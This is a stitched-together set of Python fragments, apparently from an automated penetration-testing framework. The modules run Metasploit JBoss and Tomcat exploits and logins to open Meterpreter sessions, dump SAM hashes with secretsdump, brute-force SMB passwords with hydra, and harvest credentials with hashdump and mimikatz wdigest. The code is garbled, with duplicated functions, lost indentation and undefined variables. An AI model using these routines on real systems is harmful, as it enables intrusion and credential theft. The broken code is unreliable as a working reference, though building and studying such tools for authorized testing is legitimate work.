myMsf.lock.acquire()
self.display.verbose(self.shortName + " - Connecting to " + t)
msf.execute("use auxiliary/scanner/http/jboss_vulnscan\n")
msf.execute("set RHOSTS %s\n" % t)
msf.execute("set RPORT %s\n" % p)
msf.execute("exploit\n")
msf.sleep(int(self.config['msfexploitdelay']))
outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
result = msf.getResult()
myMsf.lock.release()
Utils.writeFile(result, outfile)
kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F" ))
for line in result.splitlines():
m = re.match(r'.*Authenticated using (.*):(.*)', line)
if (m):
self.display.error("Jboss on [" + t + ":" + p + "] has default creds of [" +
m.group(1).strip() +"]/[" + m.group(2).strip() + "]")
kb.add("creds/service/jboss/" + t + "/port/" + p + "/username/"
+ m.group(1).strip() + "/password/" + m.group(2).strip())
self.fire("newJbossPassword")
# clean up after ourselves
result = msf.cleanup()
return
def process(self):
# load any targets we are interested in
self.getTargets()
# loop over each target
for t in self.targets:
users = self.getUsers(t)
self.display.verbose(self.shortName + " - Connecting to " + t)
for user in users:
# verify we have not tested this host before
if not self.seentarget(t + str(user)):
# add the new IP to the already seen list
self.addseentarget(t + str(user))
passwords = kb.get(['creds/host/' + t + '/username/' + user + '/password'])
for password in passwords:
self.display.verbose(self.shortName + " - Connecting to " + t)
# make outfile
temp_file = self.config[
"proofsDir"] + self.shortName + "_" + t + "_" + user + "_" + Utils.getRandStr(
10)
# run secretesdump.py
command = self.config["secretsdump.py"] + " -outputfile " + temp_file + " \"" + user + "\":\"" + password + \
"\"@" + t
result = Utils.execWait(command, None)
if Utils.isReadable(temp_file + '.sam'):
with open (temp_file + '.sam', "r") as myfile:
result=myfile.readlines()
for line in result:
m = line.split(':')
user = m[0].strip()
uid = m[1].strip()
lmhash = m[2].strip()
ntlmhash = m[3].strip()
kb.add("creds/host/" + t + "/username/" + user + "/lmhash/" + lmhash)
kb.add("creds/host/" + t + "/username/" + user + "/ntlmhash/" + ntlmhash)
kb.add("creds/host/" + t + "/username/" + user + "/fullhash/" + lmhash + ":" + ntlmhash)
self.fire("newNTLMHash")
return
def process(self):
# load any targets we are interested in
self.getTargets()
if len(self.targets) > 0:
# loop over each target
for t in self.targets:
if not self.seentarget(t):
# add the new IP to the already seen list
self.addseentarget(t)
cstrings = kb.get("vuln/host/" + t + "/snmpCred/communityString")
for community in cstrings:
command = self.config["snmpwalk"] + " -v 2c -c " + community + " " + t
result = command + "\n" + Utils.execWait(command) #append command to top of output
outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
Utils.writeFile(result, outfile)
kb.add("host/" + t + "/vuln/snmpCred/output/" + outfile.replace("/", "%2F"))
return
def testTarget(self, host, port):
success = False
# verify we have not tested this host before
if not self.seentarget(host + str(port)):
self.addseentarget(host + str(port))
# test for anonumous ftp
success = self.searchTarget(host, port, "anonymous", "*****@*****.**")
# test for user accounts
if (not success):
# get list of user creds for this host
users = self.getUsers(host)
# loop over each set of credentials
for username in users:
passwords = kb.get('host/' + host + '/user/' + username + '/password')
for password in passwords:
if (searchTarget(host, port, username, password)):
return
def process(self):
# load any targets we are interested in
self.getTargets()
if len(self.targets) > 0:
# If any results are succesful, this will become true and Fire will be called in the end
callFire = False
# loop over each target
for t in self.targets:
ports = kb.get('service/http/' + t + '/tcp')
for p in ports:
cmd = {
'config': [
"use exploit/multi/http/jboss_maindeployer",
"set RHOST %s" % t,
"set RPORT %s" % p,
"set SVHOST %s" % self.config['lhost'],
"set target 2", "set fingerprintcheck false"
],
'payload':
'linux'
}
result, outfile = self.msfExec(t, cmds)
parts = re.findall(".*Meterpreter session.*", result)
for part in parts:
callFire = True
self.addVuln(
t, self.shortName, {
"port": p,
"username": user,
"password": password,
"output": outfile.replace("/", "%2F")
})
kb.add("host/" + t + "/files/" + self.shortName + "/" +
outfile.replace("/", "%2F"))
if callFire:
self.fire("msfSession")
return
def process(self):
# load any targets we are interested in
self.getTargets()
if len(self.targets) > 0:
# loop over each target
for t in self.targets:
ports = kb.get('service/http/' + t + '/tcp')
for p in ports:
# verify we have not tested this host before
if not self.seentarget(t + p):
# add the new IP to the already seen list
self.addseentarget(t + p)
cmd = {
'config': [
"use auxiliary/scanner/http/tomcat_mgr_login",
"set RHOSTS %s" % t,
"set RPORT %s" % p
],
'payload':
'win'
}
result, outfile = self.msfExec(t, cmds)
for line in result.splitlines():
m = re.match(r'.*Successful: (.*):(.*)', line)
if (m):
self.display.error("Tomcat on [" + t + ":" +
p +
"] has default creds of [" +
m.group(1).strip() + "]/[" +
m.group(2).strip() + "]")
kb.add("creds/service/tomcat/" + t + "/tcp/" +
p + "/username/" + m.group(1).strip() +
"/password/" + m.group(2).strip())
self.fire("newTomcatPassword")
# clean up after ourselves
result = msf.cleanup()
return
def testTarget(self, host, port):
success = False
# verify we have not tested this host before
if not self.seentarget(host + str(port)):
self.addseentarget(host + str(port))
# test for anonumous ftp
success = self.searchTarget(host, port, "anonymous", "*****@*****.**")
# test for user accounts
if (not success):
# get list of user creds for this host
users = self.getUsers(host)
# loop over each set of credentials
for username in users:
passwords = kb.get('host/' + host + '/user/' + username +
'/password')
for password in passwords:
if (searchTarget(host, port, username, password)):
return
def process(self):
# load any targets we are interested in
self.getTargets()
# loop over each target
for t in self.targets:
# verify we have not tested this host before
if not self.seentarget(t):
# add the new target to the already seen list
self.addseentarget(t)
self.display.verbose(self.shortName + " - Targetting " + t)
# Find NS records
ns_list = kb.get('osint/dnsdomain/' + t + '/NS/')
ns_list2 = MyDNS.getRecord(t, "NS")
for n in ns_list2:
n = str(n)[:-1]
ns_list.append(n)
for ns in ns_list:
try:
xfr = MyDNS.getZoneXfr(ns, t)
text = ""
for k in xfr:
text += xfr[k].to_text(k) + "\n"
self.processZoneLine(xfr[k].to_text(k), t)
if text:
# make outfile
outfile = self.config[
"proofsDir"] + self.shortName + "_" + t + "_" + ns + "_" + Utils.getRandStr(
10)
# output to file
Utils.writeFile(text, outfile)
self.fire("newDNSZoneXfr")
except Exception as e:
print e
return
def process(self):
# load any targets we are interested in
self.getTargets()
# loop over each target
for t in self.targets:
users = kb.get(['host/' + t + '/user'])
self.display.verbose(self.shortName + " - Connecting to " + t)
for user in users:
# verify we have not tested this host before
if not self.seentarget(t + str(user)):
# add the new IP to the already seen list
self.addseentarget(t + str(user))
# make outfile
temp_file = self.config[
"proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(
10)
command = self.config[
"hydra"] + " -s 445 -l " + user + " -P " + self.config[
"miscDir"] + "passwords.txt smb://" + t
result = Utils.execWait(command, temp_file, timeout=30)
# Extract usernames & passwords from results and add to KB
parts = re.findall(
".* login:\s\s*([^\s]*)\s\s*password:\s\s*([^\s]*)",
result)
for part in parts:
self.fire("newSmbPassword")
self.addVuln(t, "guessable password",
{"output": temp_file.replace("/", "%2F")})
self.display.debug("Identified username [" + part[0] +
"] with password [" + part[1] +
"] on " + t)
kb.add("host/" + t + "/user/" + part[0].strip() +
"/password/" + part[1].strip())
return
def process(self):
# load any targets we are interested in
self.getTargets()
# loop over each target
for t in self.targets:
ports = kb.get(['service/https/host/' + t + '/tcpport', 'service/ssl/host/' + t + '/tcpport'])
for port in ports:
# verify we have not tested this host before
if not self.seentarget(t + str(port)):
# add the new IP to the already seen list
self.addseentarget(t + str(port))
# make outfile
temp_file = self.config["proofsDir"] + self.shortName + "_" + t + "_" + str(
port) + "_" + Utils.getRandStr(10)
command = "java -jar " + self.config["miscDir"] + "TestSSLServer.jar " + t + " " + port
result = Utils.execWait(command, temp_file, timeout=30)
# TODO - parse output and store results?
# print result
return
def process(self):
# load any targets we are interested in
self.getTargets()
for t in self.targets:
sessions = kb.get('shell/' + t + '/msf')
if len(sessions) > 0:
# loop over each target
for s in sessions:
# verify we have not tested this session before
if not self.seentarget(s):
# add the new IP to the already seen list
self.addseentarget(s)
cmd = {
'config': [
"sessions -i %s" % str(s), "SLEEP", "hashdump",
"SLEEP", "background", "SLEEP"
],
'payload':
'none'
}
result, outfile = self.msfExec(t, cmds)
cmd = {
'config': [
"sessions -i %s" % str(s), "SLEEP",
"load mimikatz", "SLEEP", "wdigest", "SLEEP",
"background", "SLEEP"
],
'payload':
'none'
}
result, outfile = self.msfExec(t, cmds)
return
def process(self):
# load any targets we are interested in
self.getTargets()
if len(self.targets) > 0:
# loop over each target
for t in self.targets:
# verify we have not tested this host before
if not self.seentarget(t):
# add the new IP to the already seen list
self.addseentarget(t)
# Get list of working community strings for this host
comStrings = kb.get("vuln/host/" + t +
"/snmpCred/communityString")
for comString in comStrings:
cmd = {
'config': [
"use auxiliary/scanner/snmp/snmp_enumusers",
"set RHOSTS %s" % t,
"set COMMUNITY %s" % comString
],
'payload':
'none'
}
result, outfile = self.msfExec(t, cmds)
# Extract usernames from results and add to KB
parts = re.findall(".* users: .*", result)
for part in parts:
userlist = (part.split(':')[2]).split(',')
for username in userlist:
kb.add("creds/host/" + t + "/username/" +
username.strip())
return
def getTargets(self):
# we are interested only in the hosts that had nullsessions
self.targets = kb.get('host/*/msfSession')
def getTargets(self):
self.targets = kb.get('port/tcp/111', 'port/udp/111')
def getTargets(self):
self.targets = kb.get(['host/*/tcpport/5800', 'host/*/tcpport/5900'])
def getTargets(self):
self.targets = kb.get('service/ldap')
def getTargets(self):
# we are interested in all hosts
self.targets = kb.get('host/*/tcpport/21')
self.targets2 = kb.get('service/ftp/host')
def getTargets(self):
# we are interested in all hosts
self.targets = kb.get('port/tcp/445', 'port/tcp/139')
self.targets2 = kb.get('service/smb')
def getTargets(self):
self.targets = kb.get(['host/*/tcpport/139', 'host/*/tcpport/445'])
def getTargets(self):
self.targets = kb.get('host/*/tcpport/111')
def getTargets(self):
# we are interested only in the hosts that have UDP 161 open
self.targets = kb.get('host/*/vuln/snmpCred')
def getTargets(self):
# we are interested in all hosts
self.targets = kb.get('host/*/tcpport/21')
self.targets2 = kb.get('service/ftp/host')
def process(self):
# load any targets we are interested in
self.getTargets()
# loop over each target
for t in self.targets:
ports = kb.get('service/https/' + t + '/tcp', 'service/ssl/' + t + '/tcp')
for port in ports:
# verify we have not tested this host before
if not self.seentarget(t + str(port)):
# add the new IP to the already seen list
self.addseentarget(t + str(port))
# make outfile
temp_file = self.config["proofsDir"] + self.shortName + "_" + t + "_" + str(
port) + "_" + Utils.getRandStr(10)
command = self.config["sslscan"] + " --no-color " + t + ":" + port
result = Utils.execWait(command, temp_file, timeout=60)
depricatedlist = []
weakciphers = []
keystrength = ""
with open (temp_file, "r") as myfile:
result=myfile.readlines()
for line in result:
m = re.match(r'^\s*Accepted\s\s+([^ ]*)\s\s*(\d\d*)\s\s*bits\s*([^ ]*)', line)
if (m):
protocol = m.group(1).strip()
bit = m.group(2).strip()
cipher = m.group(3).strip()
if (protocol == "SSLv2"):
if protocol not in depricatedlist:
depricatedlist.append(protocol)
elif (protocol == "SSLv3"):
if protocol not in depricatedlist:
depricatedlist.append(protocol)
elif (protocol == "TLSv1.0"):
if protocol not in depricatedlist:
depricatedlist.append(protocol)
elif (protocol == "TLSv1.1"):
if protocol not in depricatedlist:
depricatedlist.append(protocol)
elif (protocol == "TLSv1.2"):
if "DES" in cipher:
if cipher not in weakciphers:
weakciphers.append(cipher)
elif "RSA" in cipher:
if cipher not in weakciphers:
weakciphers.append(cipher)
elif "NULL" in cipher:
if cipher not in weakciphers:
weakciphers.append(cipher)
elif int(bit) < 112:
if cipher not in weakciphers:
weakciphers.append(cipher)
else:
m = re.match(r'^\s*RSA Key Strength:\s*(\d\d*)', line)
if (m):
if int(m.group(1).strip()) < 2048:
keystrength = m.group(1).strip()
# store data into KB
for depricatedProto in depricatedlist:
kb.add('service/https/' + t + '/tcp/' + port + '/depricatedSSLProto/' + depricatedProto)
for weakCipher in weakciphers:
kb.add('service/https/' + t + '/tcp/' + port + '/weakSSLCipher/' + weakCipher)
if keystrength is not "":
kb.add('service/https/' + t + '/tcp/' + port + '/weakSSLKeyStrength/' + keystrength)
# improve the output
self.display.debug(t + "," + str(port) + "," + ' '.join(depricatedlist) + "," + ' '.join(
weakciphers) + "," + keystrength)
return
def getTargets(self):
self.targets = kb.get('service/https', 'service/ssl')
def getTargets(self):
self.targets = kb.get(['host/*/tcpport/389', 'host/*/udpport/389'])
def getTargets(self):
self.targets = kb.get('port/tcp/5800', 'port/tcp/5900')
def process(self):
# load any targets we are interested in
self.getTargets()
# loop over each target
for t in self.targets:
ports = kb.get('service/https/' + t + '/tcp', 'service/ssl/' + t + '/tcp')
for port in ports:
# verify we have not tested this host before
if not self.seentarget(t + str(port)):
# add the new IP to the already seen list
self.addseentarget(t + str(port))
# make outfile
temp_file = self.config["proofsDir"] + self.shortName + "_" + t + "_" + str(
port) + "_" + Utils.getRandStr(10)
command = self.config["java"] + " -jar " + self.config["miscDir"] + "TestSSLServer.jar " + t + " " + port
result = Utils.execWait(command, temp_file, timeout=30)
depricatedlist = []
weakciphers = []
keystrength = ""
tls12 = False
with open (temp_file, "r") as myfile:
result=myfile.readlines()
for line in result:
if (tls12):
m = re.match(r'^ (.*)', line)
if (m):
cipher = line.strip()
if "DES" in cipher:
if cipher not in weakciphers:
weakciphers.append(cipher)
elif "RSA" in cipher:
if cipher not in weakciphers:
weakciphers.append(cipher)
elif "NULL" in cipher:
if cipher not in weakciphers:
weakciphers.append(cipher)
else:
tls12 = False
else:
m = re.match(r'^\s*Supported versions: (.*)', line)
if (m):
if ("SSLv2" in m.group(1)):
protocol = "SSLv2"
if protocol not in depricatedlist:
depricatedlist.append(protocol)
elif ("SSLv3" in m.group(1)):
protocol = "SSLv3"
if protocol not in depricatedlist:
depricatedlist.append(protocol)
elif ("TLSv1.0" in m.group(1)):
protocol = "TLSv1.0"
if protocol not in depricatedlist:
depricatedlist.append(protocol)
elif ("TLSv1.1" in m.group(1)):
protocol = "TLSv1.1"
if protocol not in depricatedlist:
depricatedlist.append(protocol)
m = re.match(r'^ TLSv1.2\s*', line)
if (m):
tls12 = True
# store data into KB
for depricatedProto in depricatedlist:
kb.add('service/https/' + t + '/tcp/' + port + '/depricatedSSLProto/' + depricatedProto)
for weakCipher in weakciphers:
kb.add('service/https/' + t + '/tcp/' + port + '/weakSSLCipher/' + weakCipher)
if keystrength is not "":
kb.add('service/https/' + t + '/tcp/' + port + '/weakSSLKeyStrength/' + keystrength)
return
